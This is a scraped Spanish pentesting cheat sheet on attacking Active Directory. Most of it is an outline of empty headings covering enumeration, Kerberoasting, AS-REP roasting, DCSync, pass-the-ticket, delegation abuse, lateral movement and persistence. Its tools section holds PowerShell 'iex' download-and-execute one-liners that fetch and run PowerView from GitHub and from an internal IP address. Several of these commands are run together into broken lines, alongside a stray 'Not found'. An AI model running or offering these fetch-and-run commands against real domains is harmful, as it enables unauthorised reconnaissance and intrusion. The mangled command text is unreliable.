Active directory
Herramientas
git clone "https://github.com/samratashok/ADModule.git"
cd ADModule
Import-Module .\Microsoft.ActiveDirectory.Management.dll
Import-Module .\ActiveDirectory\ActiveDirectory.psd1 iex ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/dev/Recon/PowerView.ps1'))iex ((New-Object Net.WebClient).DownloadString('http://192.168.1.100/PowerView.ps1'))cd PowerSploit\Recon
. .\PowerView.ps1Not found
ADExplorer
ADRecon
ADAPE
Ping Castle
Configuración DNS
Cambiar servidor DNS del sistema
Añadir registro DNS manualmente
Enumeración manual
Enumeración automatizada
BloodHound
Ataques
Password Spraying
ADCS - Certificados vulnerables
DCsync
AS-REP Roasting - Autenticación de kerberos no requerida
Kerberoasting
Pass the Ticket - PTT
Windows
Linux
Delegación
Delegación no restringida / Unconstrained Delegation
Herramienta
Comando
Delegación restringida / Constained Delegation
Herramienta
Comando
Movimiento lateral
Conexiones remotas
SC
Persistencia
Creación de usuarios
Casos de ataque
Ejemplo 1 - Máquinas con acceso privilegiado + PTT

Referencias
Última actualización